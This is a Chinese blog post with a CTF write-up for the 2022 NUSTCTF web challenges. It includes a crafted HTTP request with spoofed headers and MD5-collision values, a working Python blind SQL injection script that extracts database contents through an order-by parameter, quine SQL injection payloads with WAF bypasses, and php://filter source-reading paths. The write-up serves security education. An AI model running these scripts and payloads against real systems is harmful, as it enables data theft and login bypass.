2022NUSTCTF--web

最新推荐文章于 2024-10-15 15:24:52 发布
最新推荐文章于 2024-10-15 15:24:52 发布
阅读量1.3k 收藏
点赞数
分类专栏: CTF 文章标签: 前端 安全 CTF 网络安全 NUSTCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bossDDYY/article/details/127903240
版权

ezProtocol

web基础

POST / HTTP/1.1
Host: 43.143.7.97:28520
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
referer:http://localhost/
Accept-Language: zh-CN,zh;q=0.9
x-forwarded-for:127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
cookie:dinner=big%20meal
Content-Length: 1004

username=admin&p1=abc%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D6%16y%AC%CE%C5%A1LrY5fn%94%10%D9%01%C3%AC%F8%AAN%21%D0%27%BE%3Ej%A7%22%0C%D08%D3%AF%DFRo%2F%A4%8B%E8%EB45j%E4h%9C%21%22%AB%7E%BC%8E%7C%17%9E%C3Xg%D7%A8%CDHt%BE%AB.%2FWb%3Eb%EA%FC%261%0F_%3D%AFo%3F%1E%DE%E8i%86%7D%BF%C7_Q%CDA%B4%CF%B8n%06Ir%7F%5C%A3k%F9%2AO%DFF%2A%F3%8BcH%FF%85%3F%0D%D0%9B%C7%C8-%12%92&p2=abc%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D6%16y%AC%CE%C5%A1LrY5fn%94%10%D9%01%C3%ACx%AAN%21%D0%27%BE%3Ej%A7%22%0C%D08%D3%AF%DFRo%2F%A4%8B%E8%EB45%EA%E4h%9C%21%22%AB%7E%BC%8E%7C%17%9E%C3%D8g%D7%A8%CDHt%BE%AB.%2FWb%3Eb%EA%FC%261%0F_%3D%AFo%BF%1E%DE%E8i%86%7D%BF%C7_Q%CDA%B4%CF%B8n%06Ir%7F%5C%A3k%F9%2A%CF%DEF%2A%F3%8BcH%FF%85%3F%0D%D0%9BG%C8-%12%92

Ezsql

order by注入

实际漏洞挖掘中遇到的web利用方式,而且是非常常见的漏洞,一般这种漏洞有个比较明显的特征,传参为desc或asc

分析

打开题目 点击查询后

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VK8WO1ux-1668666193542)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114153015945.png)]

发现是排序,应该就是比较典型的漏洞:order by 排序sql注入

猜测查询语句就是select * from table order by {sort},mysql中排序有两种 desc asc,存在盲注的可能

首先我们先试试堆叠注入和联合注入

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-f8sMxGYv-1668666193543)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114153219187.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8NzdrTjQ-1668666193543)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114153256592.png)]

都不行 这里出题人说是对传递的参数sort进行了处理 无法联合注入和堆叠注入

考虑asc和desc两种状态 可以考虑布尔盲注

但是当时没有考虑当什么姿势利用布尔注入,看到wp后出题人说的是 ,rand(0) ,rand(1) 返回结果不同 可以利用此处 但是原理是什么有点不是很清楚!有无大佬解释下!

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IF2K8Erx-1668666193544)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114153719310.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hSpGWiBM-1668666193544)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114153728273.png)]

我们写脚本 构造payload

payload

import requests, time

url = "http://47.103.60.98/index.php?sort=desc,"


# mydb
def get_database():
    global url
    flag = ""
    for i in range(1, 30):
        for j in range(32, 127):
            newurl = url + f"rand(if(ascii(substr(database(),{i},1))={j},0,1))"
            resp = requests.get(newurl)
            time.sleep(0.05)
            # print(i,j,chr(j))
            if resp.text.find("Allen") > resp.text.find("Mary"):
                flag += chr(j)
                print(flag)
                break
            elif j == 126:
                return

# position
def get_tables():
    global url
    flag = ""
    for i in range(1, 30):
        for j in range(32, 127):
            new_url = url + f"rand(if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{i},1))={j},0,1))"
            resp = requests.get(new_url)
            # print(j)
            if resp.text.find("Allen") > resp.text.find("Mary"):
                flag += chr(j)
                print(flag)
                break
            elif j == 126:
                return
# id,name,position
def get_columns(table):
    global url
    flag = ""
    for i in range(1, 30):
        for j in range(32, 127):
            new_url = url + f"rand(if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='{table}'),{i},1))={j},0,1))"
            resp = requests.get(new_url)
            print(j)
            if resp.text.find("Allen") > resp.text.find("Mary"):
                flag += chr(j)
                print(flag)
                break
            elif j == 126:
                return
def get_value(column,table):
    global url
    flag = ""
    for i in range(1, 30):
        for j in range(32, 127):
            new_url = url + f"rand(if(ascii(substr((select/**/{column}/**/from/**/{table}/**/limit/**/2,1),{i},1))={j},0,1))"
            resp = requests.get(new_url)
            if resp.text.find("Allen") > resp.text.find("Mary"):
                flag += chr(j)
                print(flag)
                break
            elif j == 126:
                return
# get_database()
# get_tables()
# get_columns("position")
# flag{f96cb1d4fa4022d1616b799367f078a3}
get_value('name','position')
get_value('position','position')

有时候 group_concat 查不出来的 limit 可以试试

Translate

quine注入

为什么叫translate,是因为一开始的难点是用的pgsql数据库中的translate函数来代替最终payload中的部分replace函数。但是由于一些原因最终还是换成了mysql数据库

过滤了char(),用十六进制代替。限制了replace的使用次数最多为三次,大小写可以绕过

分析

打开题目 一个登录框

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uSB6xwaY-1668666193544)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114150335473.png)]

查看源码,发现敏感信息 base64解码看看,是 test.php 访问他看看

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hqAZqAem-1668666193545)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114150406504.png)]

给出一段php代码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6TRLAkLS-1668666193546)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114150457442.png)]

首先传入的file不能是文件名,is_file 可以通过php伪协议或者伪造目录绕过

而且我们发现存在filter

先尝试传值 看看过滤了什么

base64 string index fun 都被禁用

我们使用读取源码

php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php

这里给出常见的php伪协议读取源码的方式

php://filter/read/convert.base64-encode/resource=flag.php
php://filter/NewStar/read=string.rot13/resource=flag.php
php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php

发现给出了部分的源码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KmzL0163-1668666193546)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114150818817.png)]

我们从上面可以看出

  • 首先对输入的密码进行检查,存在过滤
  • 其次当输入的密码和查询的密码一致时输出flag,典型的quine注入

但是用户名我们未知 这里可以猜测一下 猜测不到可以弱用户民爆破,一猜就猜到了 admin (最常用的)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0Bc1qP8h-1668666193546)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114151736021.png)]

基本payload
xxxxxreplace(replace('str',char(34),char(39)),char(46),'str')#
str:(str中有单引号的话要写成双引号)
xxxxxreplace(replace(".",char(34),char(39)),char(46),".")#

1'union/**/select/**/replace(replace('1"union/**/select/**/replace(REPLACE(".",0x34,0x39),0x46,".")#',0x34,0x39),0x46,'1"union/**/select/**/REPLACE(REPLACE(".",0x34,0x39),0x46,".")#')#

构造payload
1'union/**/select/**/replace(replace('1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

然后发现被waf挡住了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AFTyrv4K-1668666193547)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114152001339.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ldVwdD8a-1668666193547)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114152029111.png)]

大概waf过滤了:char 空格

  • 查找发现过滤了char 我们使用0x替换
  • replace的次数不能超过三次 使用大小写绕过限制

修改payload

Y'union/**/select/**/replace(REPLACE('Y"union/**/select/**/replace(REPLACE(".",0x22,0x27),0x2e,".")#',0x22,0x27),0x2e,'Y"union/**/select/**/replace(REPLACE(".",0x22,0x27),0x2e,".")#')#

输出了flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ewT646Z0-1668666193548)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114152842712.png)]

payload

password=Y'union/**/select/**/replace(REPLACE('Y"union/**/select/**/replace(REPLACE(".",0x22,0x27),0x2e,".")#',0x22,0x27),0x2e,'Y"union/**/select/**/replace(REPLACE(".",0x22,0x27),0x2e,".")#')#&username=admin

java的不太会!

yb0os1
关注
专栏目录
# NUSTCTF(校外道)2022-wp
Laffrey的专栏
11-12 1496
NUSTCTF(校外道)2022-wp
NSS [NUSTCTF 2022 新生]Ezjava1
Jay17的博客
08-30 910
NSS [NUSTCTF 2022 新生]Ezjava1
[NUSTCTF 2022 新生]ezProtocol
weixin_45906533的博客
11-19 413
你刚才参观过http://localhost/吗,上面用的是X-Forwarded-For,那么这里用的就是referer。数组绕过,直接就报错了,说明用的可能是强比较了,至于报错,那是因为将我们传入的参数强行转换成字符串类型了,所以才报错了。但是发现还是一样的结果,这是为什么呢,这个要注意其实是因为我们最后一行多了一个换行,将第八行删除,再发包就可以了。生成成功,但是打开文件会发现文件内容是乱码的,所以我们要对其进行一下url编码。p1和p2内容不能相同,但是md5值必须相同,尝试一下数组绕过。
CTF】[UUCTF 2022 新生]ez_upload
西原一点红的博客
06-19 1051
Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。webshell工具连接。flag 在/目录下。
NSS [UUCTF 2022 新生]ez_unser
Jay17的博客
07-04 882
NSS [UUCTF 2022 新生]ez_unser
NSSCTF第12页(3)
wwwwyyyrre的博客
11-16 525
首先,代码定义了一个名为 waf 的函数,用于执行一个简单的文件扩展名检查来防止上传恶意文件。$black_list 是一个存储不允许的文件扩展名的数组,如 “ph”、“htaccess” 和 “ini”。pathinfo($filename, PATHINFO_EXTENSION) 用于获取上传文件的扩展名。在 foreach 循环中,代码检查上传文件的扩展名是否在黑名单中。如果扩展名在黑名单中,函数返回 false,否则返回 true。
NSSCTF web刷题记录7
rev1ve的博客
12-11 478
将url的字符串拿去解码,得到json格式数据。打开题目发现是curl命令,提示填入url。读取下环境变量,得到flag。
[祥云杯 2022]ezjava
Sentiment的博客
11-04 1084
中卡在了内存马上,了解完Controller和Interceptor内存马后,再来复现一下。
NSSCTF中的[SWPUCTF 2022 新生]ez_ez_unserialize、baby_file、Middle magic、numgame、where_am_i、easy_upload
2401_82388450的博客
06-06 1109
1.绕过wakeup函数可以将序列化的中的成员数大于实际成员数2.了解了json_decode函数函数只能匹配一行的数据,因此我们只需先传入换行符,那么后面的传入便不再被匹配4.php弱比较时,面对纯字符与0的比较时,会返回true5.了解了call_user_func()函数,知道了::双冒号运算符。
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生]ez_rce
weixin_46497491的博客
11-07 4134
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce
BUUCTF WEB Ezsqli
qq_41696858的博客
04-01 5653
继续刷题,comment之前在攻防世界刷过了,就不刷了。从题目上我们就知道这一题是个sql注入题 打开场景,我们发现依旧的儒雅随和 一个查询框,那么就是要硬搞了呗 经查询1,2是两条有效数字,0和其他的都是非法输入 1+1成功回显2,下面就是过滤字判断 既然是布尔型的回显,先试试0^1,嗯,异或符给我们留下了 布尔类型查用的substr,ascii先试试 0^(ascii(substr(‘hello’,1,1))>1) 1^(ascii(substr(‘hello’,1,1))>1) 成功回显,
南邮ctf-题解(停止更新)
reigns的博客
08-17 7283
由于专业名字叫网络空间安全,所以感觉不学点安全知识对不起专业名= =,本人大学四年完全没有接触过信息安全知识,发现本科母校有个网络安全训练平台,就开始练练手,做做ctf入门训练吧。 南京邮电大学网络攻防训练平台:http://ctf.nuptzj.cn/challenges# >_签到题: 就是直接查看网页源代码。 <html> <title>key...
NJUST CTF 2018 Writeup
qq_37820590的博客
03-17 2160
NJUST CTF 2018 Writeup Supernova, Nanjing Universityfrostwing98,Trap,Arcadia MISC1 签到by Arcadia一路调戏ai之后(误)可以得到一串base64编码的字符串,在线解码得到flagMISC2 GIFby frostwing98下载到gif,发现是不断闪烁的黑/白画面,第一考虑是莫尔斯电码。首先http://tu
web扩展
x737510的博客
10-10 599
HTTP(Hypertext Transfer Protocol)协议中的它们在用途和使用方式上有一些区别。用于请求服务器上的资源,通常是获取数据。GET 请求是幂等的,多次请求返回的结果应该是相同的,而且不应该对服务器产生任何副作用。用于向服务器提交数据,通常是提交表单数据或上传文件等。POST 请求可能对服务器产生副作用,例如在数据库中创建新的资源。数据通过 URL 参数传递,附在 URL 后面。因为数据在 URL 中可见,所以不适合传递敏感信息,且有长度限制。
前端开发攻略---8种方法实现在浏览器中跨页面通信
最新发布
nibabaoo的博客
10-15 1063
浏览器实现跨标签页通信的多种方式
Element-plus el-form、el-dialog 数据回显同时用时,重置失效问题
Mr. Zhang Xiaojian's Blog
10-12 472
当第一次打开网页并点击“编辑”按钮时,虽然对话框变量变为 true 使对话框可见,但同步代码会将 formData 对象的属性设置为默认值。由于 Vue 的异步更新机制,DOM 实际上还未更新,因此表单组件内绑定了这些有值的初始数据。这样,在后续调用 resetFields 方法时,表单将会重置为这些默认值而不是空值。编辑时表单的初始值被设置成了回显的数据,而不是空字符串。时,表单会回到上次设置的初始值,即回显的数据。
Vue3动态组件component不生效问题解决方法
Java_fenxiang的博客
10-14 512
问题:vue3循环渲染动态组件component不生效,页面空白在vue3使用component动态组件展示组件时,组件就是不展示显示空白。在vue2中使用动态变量component展示组件都是没问题。试了很多方法 踩了很多坑,所以记录下:登录后复制 <div class="preview-list" id="c...
基于monaco-editor的web日志组件
暗影刀客的博客
10-12 274
一个基于monaco-editor的web日志组件,支持灵活的扩展配置,支持vue和react
探秘纯前端Excel表格:构建现金流量表的完整指南
葡萄城技术团队博客
10-10 1128
现金流量表(Cash Flow Statement),是指反映企业在一定会计期间现金和现金等价物流入和流出的报表。现金流量表是企业财务报表的三个基本报告之一(另外两个是资产负债表和损益表)。为了全面系统地揭示企业一定时期的财务状况、经营成果和现金流量,财务报表需按财政部会计准则的标准格式设计,因此,财务报表的典型特征是数据更新频繁、分析维度多、数据来源复杂,常规的报表工具很难同时满足上述所有需求本博客将带大家了解如何使用类Excel 的 JavaScript 电子表格在前端创建现金流日历。。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值